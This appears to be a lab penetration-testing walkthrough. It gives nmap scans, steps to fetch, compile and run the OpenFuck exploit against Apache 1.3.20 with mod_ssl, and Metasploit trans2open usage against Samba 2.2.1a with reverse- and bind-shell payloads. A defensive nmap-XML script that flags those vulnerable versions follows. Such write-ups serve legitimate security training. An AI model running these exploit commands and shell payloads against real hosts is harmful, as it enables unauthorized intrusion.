nmap -sV <IP>
nmap -sV -sT -A -O -v <IP>
nmap -vvv -A -oA <basename> <IP>
nmap -p- -sV -sS -T4 -A <IP>
Apache httpd 1.3.20
((Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b)
This Apache version is vulnerable to the mod_ssl bug exploited by "OpenFuck". The old openfuck.c no longer works, so get the latest OpenFuck from GitHub: https://github.com/heltonWernik/OpenLuck
Use the following steps:
- Download OpenFuck.c
git clone https://github.com/heltonWernik/OpenLuck.git
- Install the SSL development library
apt-get install libssl-dev
- Compile it
gcc -o OpenFuck OpenFuck.c -lcrypto
- Run the exploit (with no arguments it prints the list of supported targets)
./OpenFuck
- Pick the target that matches the service you wish to exploit. For example, for Red Hat Linux running Apache 1.3.20, try the 0x6a option: ./OpenFuck 0x6a [Target IP] [port] -c 40
./OpenFuck 0x6a 192.168.80.145 443 -c 40
enum4linux: use this tool to check whether RPC login works with a null username and null password, and to gather other details about the host.
Samba version: to find the Samba version, use the Metasploit scanner
use auxiliary/scanner/smb/smb_version
Samba: Samba 2.2.1a
This version has the trans2open vulnerability, and an exploit is available in Metasploit
exploit: use exploit/linux/samba/trans2open
Set a payload for the exploit. linux/x86/meterpreter/reverse_tcp will not work against this target, so use one of the payloads listed below instead:
set payload generic/shell_reverse_tcp
set payload linux/x86/shell_bind_tcp
set payload linux/x86/shell/bind_tcp
set payload linux/x86/shell/reverse_tcp
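The two findings above (Apache httpd 1.3.20 with mod_ssl 2.8.4, and Samba 2.2.1a) are exactly the kind of thing a defender wants to catch in their own scan output before anyone else does. The following script is an added example, not part of the original post or of any tool named in it: it parses nmap XML output (what `-oX` or `-oA` writes), pulls the product/version strings from each open port, and flags services that match the versions this write-up names, plus anything on the end-of-life Apache 1.3 or Samba 2.2 branches. The nmap XML sample embedded in it is constructed to mirror the banners above; the watch-list table and the function names are assumptions of this example.

```python
"""Flag known-vulnerable and end-of-life service versions in nmap XML output.

Added example for this write-up; the sample scan below is constructed, not a
real capture, and the watch-list reflects only the versions the post names.
"""
import re
import xml.etree.ElementTree as ET

# Constructed sample of `nmap -sV -oX` output, modelled on the banners in the post.
SAMPLE_NMAP_XML = """<?xml version="1.0"?>
<nmaprun scanner="nmap">
  <host>
    <address addr="192.168.80.145" addrtype="ipv4"/>
    <ports>
      <port protocol="tcp" portid="22">
        <state state="open"/>
        <service name="ssh" product="OpenSSH" version="2.9p2"/>
      </port>
      <port protocol="tcp" portid="80">
        <state state="open"/>
        <service name="http" product="Apache httpd" version="1.3.20"
                 extrainfo="(Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b"/>
      </port>
      <port protocol="tcp" portid="139">
        <state state="open"/>
        <service name="netbios-ssn" product="Samba smbd" version="2.2.1a"/>
      </port>
      <port protocol="tcp" portid="443">
        <state state="open"/>
        <service name="ssl/https" product="Apache httpd" version="1.3.20"
                 extrainfo="(Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b"/>
      </port>
    </ports>
  </host>
</nmaprun>
"""

# Watch-list (assumed for this example): product substring, version regex,
# optional extrainfo regex, and the remediation note to attach.
WATCHLIST = [
    ("Apache httpd", r"^1\.3\.20$", r"mod_ssl/2\.8\.4",
     "Apache 1.3.20 with mod_ssl 2.8.4: mod_ssl flaw targeted by 'OpenFuck'; upgrade httpd and mod_ssl"),
    ("Samba", r"^2\.2\.1a$", None,
     "Samba 2.2.1a: trans2open flaw (Metasploit exploit/linux/samba/trans2open); upgrade Samba"),
]

# Entire branches that have been unsupported for years; anything here needs replacing.
EOL_BRANCHES = [("Apache httpd", r"^1\.3\."), ("Samba", r"^2\.2\.")]


def parse_services(xml_text):
    """Return one record per open port that nmap attached a service element to."""
    root = ET.fromstring(xml_text)
    records = []
    for host in root.iter("host"):
        addr_el = host.find("address")
        addr = addr_el.get("addr") if addr_el is not None else "?"
        for port in host.iter("port"):
            state = port.find("state")
            if state is None or state.get("state") != "open":
                continue
            svc = port.find("service")
            if svc is None:
                continue
            records.append({
                "host": addr,
                "port": int(port.get("portid")),
                "proto": port.get("protocol"),
                "product": svc.get("product", ""),
                "version": svc.get("version", ""),
                "extrainfo": svc.get("extrainfo", ""),
            })
    return records


def assess(records):
    """Match each service against the watch-list and the EOL branches."""
    findings = []
    for rec in records:
        for product, version_re, extra_re, issue in WATCHLIST:
            if (product in rec["product"]
                    and re.search(version_re, rec["version"])
                    and (extra_re is None or re.search(extra_re, rec["extrainfo"]))):
                findings.append({**rec, "severity": "known-vulnerable", "issue": issue})
        for product, branch_re in EOL_BRANCHES:
            if product in rec["product"] and re.search(branch_re, rec["version"]):
                findings.append({**rec, "severity": "end-of-life",
                                 "issue": f"{rec['product']} {rec['version']} is on an unsupported branch"})
    return findings


if __name__ == "__main__":
    for f in sorted(assess(parse_services(SAMPLE_NMAP_XML)), key=lambda x: x["port"]):
        print(f"{f['host']}:{f['port']}/{f['proto']} [{f['severity']}] {f['issue']}")
```

Point it at a real scan with `parse_services(open("scan.xml").read())`; the watch-list is a plain list, so extending it to your own fleet's banned versions is a one-line change per entry. Note that nmap's `extrainfo` is where mod_ssl/OpenSSL versions land for Apache, which is why the Apache entry checks it separately from `version`.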